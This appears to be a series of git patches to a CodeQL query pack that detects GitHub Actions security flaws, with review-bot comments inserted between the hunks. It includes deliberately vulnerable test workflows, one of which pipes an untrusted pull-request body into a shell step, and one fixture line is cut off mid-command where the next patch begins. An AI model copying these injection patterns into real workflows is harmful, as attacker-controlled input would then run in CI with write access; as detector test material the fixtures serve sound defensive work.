@@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"] - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection", "manual"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml index ae3ef2e2b1b7..5b22ac1f5fe8 100644 --- a/ql/lib/ext/ros-tooling_setup-ros.model.yml +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"] 
diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index 079dfc1fc02b..3329a255e6f8 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 19edd617c670..14a1cdeed86a 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"] diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/sergeysova_jq-action.model.yml index 8ab1d090b1cc..49931d93f885 100644 --- a/ql/lib/ext/sergeysova_jq-action.model.yml +++ b/ql/lib/ext/sergeysova_jq-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] 
diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml index 9f8d987c0aff..37d0014bcbb4 100644 --- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml index 90a181038680..9058c9fb984c 100644 --- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"] diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml index fd484074f5c5..713c5c61cea7 100644 --- a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml index 5caaea9562e1..40b02283152a 100644 --- a/ql/lib/ext/snow-actions_eclint.model.yml +++ b/ql/lib/ext/snow-actions_eclint.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml index 9462b8d5bbd1..c08505f97477 100644 --- a/ql/lib/ext/stackhawk_hawkscan-action.model.yml +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"] - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection", "manual"] diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml index 9b01987e1f28..6305fd339604 100644 --- a/ql/lib/ext/step-security_harden-runner.model.yml +++ b/ql/lib/ext/step-security_harden-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml index 10a3630ea0bd..739880968188 100644 --- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml index aac20afddf56..ee9a0dbb32a6 100644 --- a/ql/lib/ext/tibdex_backport.model.yml 
+++ b/ql/lib/ext/tibdex_backport.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"] - ["tibdex/backport", "*", "input.head_template", "code-injection", "manual"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml index 8dcabd1650a6..f056cf5d8644 100644 --- a/ql/lib/ext/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"] - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint", "manual"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index d98eda4e69f8..838f0b308487 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: # https://github.com/tj-actions/branch-names - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"] diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index b8fb2514253c..c215755f61dd 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"] - ["trilom/file-changes-action", "*", "output.files_added", "filename", "manual"] 
diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml index ae166b1f5154..014e779b29a0 100644 --- a/ql/lib/ext/tripss_conventional-changelog-action.model.yml +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"] - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection", "manual"] diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml index a6cc68843895..806c055529df 100644 --- a/ql/lib/ext/tryghost_action-deploy-theme.model.yml +++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"] - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection", "manual"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index 499161aafcb3..d6e554a87092 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"] diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml index a352d6c9ff61..55d1531a7707 100644 --- a/ql/lib/ext/veracode_veracode-sca.model.yml +++ b/ql/lib/ext/veracode_veracode-sca.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] - ["veracode/veracode-sca", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml index 6ed71f182151..c52d62e204a4 100644 --- a/ql/lib/ext/wearerequired_lint-action.model.yml +++ b/ql/lib/ext/wearerequired_lint-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"] - ["wearerequired/lint-action", "*", "input.git_email", "command-injection", "manual"] diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml index 5864c0d0ede0..1e915194d96e 100644 --- a/ql/lib/ext/webfactory_ssh-agent.model.yml +++ b/ql/lib/ext/webfactory_ssh-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"] - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection", "manual"] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 173ecfc4222f..1cc360c472d2 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] 
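Review bot: The two `data` rows of the xt0rted/slash-command-action model on the new side are byte-identical (`"output.command-arguments", "text", "manual"` twice), so the second row is redundant and should be dropped, or corrected if a different output was meant. This predates the `actionsSourceModel` rename, but the hunk already rewrites the file's header and is the natural place to fix it. The hunk counts (`-1,7 +1,7`) confirm both rows are real lines rather than a display artefact.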
diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml index 880b0d606da2..cb7e0936cca1 100644 --- a/ql/lib/ext/zaproxy_action-baseline.model.yml +++ b/ql/lib/ext/zaproxy_action-baseline.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"] - ["zaproxy/action-baseline", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml index fd8172c6ca84..210c3365eda9 100644 --- a/ql/lib/ext/zaproxy_action-full-scan.model.yml +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"] - ["zaproxy/action-full-scan", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/qlpack.gbo b/ql/lib/qlpack.gbo deleted file mode 100644 index c77f7924c126..000000000000 --- a/ql/lib/qlpack.gbo +++ /dev/null @@ -1,13 +0,0 @@ ---- -warnOnImplicitThis: false -name: seclab/actions-all -version: 0.0.1-dev -groups: actions -extractor: actions -library: true -tests: test -dependencies: - codeql/javascript-all: ^0.8.7 - "codeql/controlflow": "*" - "codeql/dataflow": "*" - "codeql/ssa": "*" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9acfb3035a41..f898f18a295f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -4,14 +4,13 @@ warnOnImplicitThis: true
 name: githubsecuritylab/actions-all
 version: 0.0.32
 dependencies:
- codeql/util: ^0.2.0
- codeql/yaml: ^0.1.2
- codeql/controlflow: ^0.1.0
- codeql/dataflow: ^0.1.0
-dbscheme: yaml.dbscheme
-extractor: yaml
-groups:
- - yaml
+ codeql/javascript-all: '*'
+ codeql/util: '*'
+ codeql/yaml: '*'
+ codeql/controlflow: '*'
+ codeql/dataflow: '*'
+extractor: javascript
+groups: javascript
 dataExtensions:
 - ext/*.model.yml
 - ext/**/*.model.yml
diff --git a/ql/lib/yaml.dbscheme b/ql/lib/yaml.dbscheme
deleted file mode 100644
index 20d83c71ee67..000000000000
--- a/ql/lib/yaml.dbscheme
+++ /dev/null
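Review bot: All five dependency ranges on the new side of `ql/lib/qlpack.yml` are `'*'`, which accepts any published version of `codeql/javascript-all`, `codeql/util`, `codeql/yaml`, `codeql/controlflow` and `codeql/dataflow`, where the removed lines at least carried caret floors such as `^0.2.0`. With a wildcard the resolved versions rest entirely on the lock files (the `ql/src` and `ql/test` lock hunks further down pin `codeql/javascript-all` at 0.5.2), and any consumer of the library pack without a lock can pick up an untested or incompatible release. Caret ranges matching the locked versions, e.g. `codeql/javascript-all: ^0.5.2`, would keep the upgrade path while bounding what resolves; the same applies to the `codeql/javascript-all: '*'` line added in `ql/src/qlpack.yml`.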
@@ -1,80 +0,0 @@ -/*- YAML -*/ - -#keyset[parent, idx] -yaml (unique int id: @yaml_node, - int kind: int ref, - int parent: @yaml_node_parent ref, - int idx: int ref, - string tag: string ref, - string tostring: string ref); - -case @yaml_node.kind of - 0 = @yaml_scalar_node -| 1 = @yaml_mapping_node -| 2 = @yaml_sequence_node -| 3 = @yaml_alias_node -; - -@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; - -@yaml_node_parent = @yaml_collection_node | @file; - -yaml_anchors (unique int node: @yaml_node ref, - string anchor: string ref); - -yaml_aliases (unique int alias: @yaml_alias_node ref, - string target: string ref); - -yaml_scalars (unique int scalar: @yaml_scalar_node ref, - int style: int ref, - string value: string ref); - -yaml_errors (unique int id: @yaml_error, - string message: string ref); - -yaml_locations(unique int locatable: @yaml_locatable ref, - int location: @location_default ref); - -@yaml_locatable = @yaml_node | @yaml_error; - -/*- Files and folders -*/ - -/** - * The location of an element. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `file`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ -locations_default( - unique int id: @location_default, - int file: @file ref, - int beginLine: int ref, - int beginColumn: int ref, - int endLine: int ref, - int endColumn: int ref -); - -files( - unique int id: @file, - string name: string ref -); - -folders( - unique int id: @folder, - string name: string ref -); - -@container = @file | @folder - -containerparent( - int parent: @container ref, - unique int child: @container ref -); - -/*- Source location prefix -*/ - -/** - * The source location of the snapshot. - */ -sourceLocationPrefix(string prefix : string ref); 
diff --git a/ql/lib/yaml.dbscheme.stats b/ql/lib/yaml.dbscheme.stats deleted file mode 100644 index 1c35ae984020..000000000000 --- a/ql/lib/yaml.dbscheme.stats +++ /dev/null @@ -1,4 +0,0 @@ - - - - \ No newline at end of file diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 84a6ccba26dc..ce7000fc1b9d 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -5,8 +5,14 @@ dependencies: version: 0.1.8 codeql/dataflow: version: 0.1.8 + codeql/javascript-all: + version: 0.5.2 + codeql/regex: + version: 0.0.10 codeql/ssa: version: 0.2.8 + codeql/tutorial: + version: 0.0.7 codeql/typetracking: version: 0.2.8 codeql/util: diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 5637bef68a03..4192be6a4caf 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -2,12 +2,11 @@ library: false name: githubsecuritylab/actions-queries version: 0.0.32 -groups: - - actions - - queries +groups: [actions, queries] suites: codeql-suites -extractor: yaml +extractor: javascript defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: + codeql/javascript-all: '*' githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 84a6ccba26dc..ce7000fc1b9d 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -5,8 +5,14 @@ dependencies: version: 0.1.8 codeql/dataflow: version: 0.1.8 + codeql/javascript-all: + version: 0.5.2 + codeql/regex: + version: 0.0.10 codeql/ssa: version: 0.2.8 + codeql/tutorial: + version: 0.0.7 codeql/typetracking: version: 0.2.8 codeql/util: diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index e3304b4fe72b..80ebd80b4c2b 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql 
@@ -50,13 +50,13 @@ query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = query predicate scopes(Cfg::CfgScope c) { any() } query predicate sources(string action, string version, string output, string kind, string provenance) { - sourceModel(action, version, output, kind, provenance) + actionsSourceModel(action, version, output, kind, provenance) } query predicate summaries( string action, string version, string input, string output, string kind, string provenance ) { - summaryModel(action, version, input, output, kind, provenance) + actionsSummaryModel(action, version, input, output, kind, provenance) } query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml index d85fc698394d..1676d742d37e 100644 --- a/ql/test/qlpack.yml +++ b/ql/test/qlpack.yml @@ -1,12 +1,10 @@ --- name: githubsecuritylab/actions-tests -groups: - - actions - - test +groups: [javascript, test] dependencies: githubsecuritylab/actions-all: ${workspace} githubsecuritylab/actions-queries: ${workspace} -extractor: yaml +extractor: javascript tests: . warnOnImplicitThis: true From 65b51996a6ff02d2d97e1480a768756ed18af33a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 3 Jun 2024 18:59:51 +0200 Subject: [PATCH 315/707] new tests --- .../security/ArtifactPoisoningQuery.qll | 2 +- .../.github/workflows/artifactpoisoning7.yml | 21 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 8 +++++++ .../CWE-094/CodeInjectionMedium.expected | 7 +++++++ .../.github/workflows/artifactpoisoning7.yml | 21 +++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 1 + 6 files changed, 59 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml 
diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 3635004bc318..45d9a08d00ab 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -44,7 +44,7 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep ) and ( not exists(this.getArgument(["run-id", "run_id", "workflow-run-id", "workflow_run_id"])) or - not this.getArgument(["run-id", "run_id", "workflow-run-id", "workflow_run_id"]) + this.getArgument(["run-id", "run_id", "workflow-run-id", "workflow_run_id"]) .matches("%github.event.workflow_run.id%") ) and ( diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml new file mode 100644 index 000000000000..e815c3dd1292 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml 
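Review bot: The corrected disjunction now treats the step as an untrusted download both when no run-id argument is present and when the argument contains `github.event.workflow_run.id`, but nothing in the hunk records why either case is risky, so a later reader could reintroduce the removed `not`. A comment above the `(` such as `// untrusted when no run id is given (the action presumably resolves a run itself) or when the run id is the triggering workflow_run, whose artifacts may have been produced by an untrusted workflow` would pin the intent. Note also that `matches("%github.event.workflow_run.id%")` is a substring test on the argument text, so a run id that reaches the step through an env var or step output would not be recognised here; whether that is covered elsewhere depends on `getArgument`, which is defined outside this hunk. The enclosing class `DownloadArtifactActionStep` starts before the hunk and continues after it.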
@@ -0,0 +1,21 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + # Save PR id to output + - name: Save artifact data + id: artifact + run: echo "::set-output name=id::$( Date: Mon, 3 Jun 2024 22:17:42 +0200 Subject: [PATCH 316/707] Dont consider pull_request with write permissions as priv --- ql/lib/codeql/actions/ast/internal/Ast.qll | 3 ++- .../.github/workflows/priv_pull_request.yml | 14 ++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 1 + .../Security/CWE-094/CodeInjectionMedium.expected | 2 ++ .../CWE-829/UntrustedCheckoutCritical.expected | 1 - .../CWE-829/UntrustedCheckoutMedium.expected | 1 + 6 files changed, 20 insertions(+), 2 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e31edf7900af..d4864a80e54f 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -890,7 +890,8 @@ class JobImpl extends AstNodeImpl, TJobNode { e.isExternallyTriggerable() and // job is privileged (write access or access to secrets) ( - this.isPrivileged() + this.isPrivileged() and + not e.getName() = "pull_request" or not this.isPrivileged() and e.isPrivileged() diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml new file mode 100644 index 000000000000..560e69f9e4b0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml 
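Review bot: The new `not e.getName() = "pull_request"` exclusion in `JobImpl` is a bare string comparison with no comment saying why a job that declares write permissions is still not privileged under that event, so the rationale (from the commit title and the new `priv_pull_request.yml` fixture, presumably that the `permissions` block is not honoured for pull requests from forks) should sit next to the condition, e.g. `// pull_request: the token stays read-only for fork PRs regardless of the permissions block, so the job is not privileged`. Writing the test as `e.getName() != "pull_request"` would also read more directly. Whether the second branch, `not this.isPrivileged() and e.isPrivileged()`, already yields false for `pull_request` cannot be seen from here; the enclosing predicate starts and ends outside the hunk.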
@@ -0,0 +1,14 @@ +name: Privileged (only when local) pull request + +on: + pull_request: + +permissions: + pull-requests: write + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo "${{ github.event.pull_request.body }}" diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 718ef7a4ad12..f7b4ae7bc117 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -174,6 +174,7 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 02000ea2bb04..be5a4e60b729 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -174,6 +174,7 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | 
@@ -282,6 +283,7 @@ subpaths | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. 
